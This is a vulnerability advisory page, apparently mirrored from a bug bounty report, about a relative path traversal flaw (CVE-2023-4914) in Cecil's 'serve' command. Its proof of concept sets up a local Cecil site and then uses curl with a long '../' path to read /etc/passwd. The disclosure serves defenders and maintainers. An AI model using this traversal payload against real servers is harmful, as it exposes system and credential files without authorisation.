Lucene search
OuuanCDD995B2-C983-428B-A73A-827B61B7C06BHistorySep 07, 2023 - 12:53 p.m.
Relative Path Traversal vulnerability in the serve command
2023-09-0712:53:49
ouuan
www.huntr.dev
5
cecil
path traversal
vulnerability
proof of concept
bug bounty
0.001 Low
EPSS
Percentile
37.0%
Description
When a Cecil site is served by cecil serve, Relative Path Traversal is possible via the URI path.
Proof of Concept
Run the following commands:
mkdir cecil-path-traversal-poc
cd cecil-path-traversal-poc
curl -L https://cecil.app/cecil.phar -o cecil
chmod +x cecil
./cecil new:site -n
./cecil serve
Then curl --path-as-is http://localhost:8000/../../../../../../../../etc/passwd.
Related
osv
osv
CVE-2023-4914
2023-09-12 15:15:24
Cecil Path Traversal vulnerability
2023-09-12 15:30:20
cve
cve
CVE-2023-4914
2023-09-12 15:15:24
github
github
Cecil Path Traversal vulnerability
2023-09-12 15:30:20
prion
prion
Path traversal
2023-09-12 15:15:00
nvd
nvd
CVE-2023-4914
2023-09-12 15:15:24
veracode
veracode
Path Traversal
2023-09-18 07:30:00
cvelist
cvelist
CVE-2023-4914 Relative Path Traversal in cecilapp/cecil
2023-09-12 14:11:52